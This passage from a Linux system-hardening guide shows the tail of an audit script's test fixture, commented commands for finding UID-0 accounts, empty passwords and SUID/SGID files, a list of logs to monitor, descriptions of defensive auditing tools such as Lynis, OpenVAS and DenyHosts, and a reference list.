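  : > "$d/dropbox/notes"; chmod 0666 "$d/dropbox/notes" # world-writable file
  chmod 0777 "$d/dropbox"                               # world-writable, not sticky
  chmod 1777 "$d/tmp"                                   # sticky: acceptable
  echo "$d"
}

# On a live host, e.g.:
#   find_uid0_accounts /etc/passwd; find_empty_passwords /etc/shadow
#   find_suid_sgid / > suid.today && diff suid.baseline suid.today
```

Keep the output of `find_suid_sgid` from a freshly installed system as the baseline; the interesting result on later runs is the diff, not the list itself.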

    Keeping an eye on your logs:

    You should configure logging and auditing so you can keep an eye on any type of attack launched against your system. You can check the following logs manually or use a tool like logwatch or logcheck, or any number of other log parsers. Logs of interest are (Debian/Ubuntu names; Red Hat-style systems log authentication to /var/log/secure):

    • /var/log/syslog
    • /var/log/faillog (a binary database; read it with the faillog command)
    • /var/log/auth.log
    • /var/log/lastlog (a binary database; read it with the lastlog command)
    • /var/log/messages
    • /var/log/apache2/access.log and error.log

    When all else fails, here are some useful scripts and tools you can use:

    Lynis: Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

    sectool (Security audit tool) is a security tool that can be used both for security audits and as part of an intrusion detection system. It consists of a set of tests, a library and textual/graphical front-ends. Tests are sorted into groups and security levels. Administrators can run selected tests, groups or whole security levels.

    The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, reporting granularly on each of the security settings with which it works.

    audit2.pl (perl): This second script searches the entire file system, listing SUID, SGID, world-writable and group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g., containing punctuation characters), which might be dangerous or a sign of penetration. On a large server with 100GB disks, this can take a few hours to run.

    Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfiguration that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

    DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

    OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

    References:

    http://iase.disa.mil/stigs/checklist/index.html

    http://www.sans.org/score/checklists/linuxchecklist.pdf

    http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

    http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

    http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

    http://www.cyberciti.biz/tips/linux-security.html

    http://www.debian.org/doc/manuals/securing-debian-howto/

    http://tldp.org/HOWTO/Security-HOWTO/file-security.html

    http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

    http://www.rootkit.nl/projects/lynis.html

    https://fedorahosted.org/sectool/

    http://www.security-database.com/toolswatch/

    http://securitytube.net/Mastering-IPTables-video.aspx

    http://nmap.org/

    http://www.openvas.org/

    http://www.bastille-unix.org/

    http://denyhosts.sourceforge.net/

    http://pentestmonkey.net/tools/unix-privesc-check/

    http://www.boran.ch/audit

    http://oreilly.com/pub/h/66

    http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

    http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/
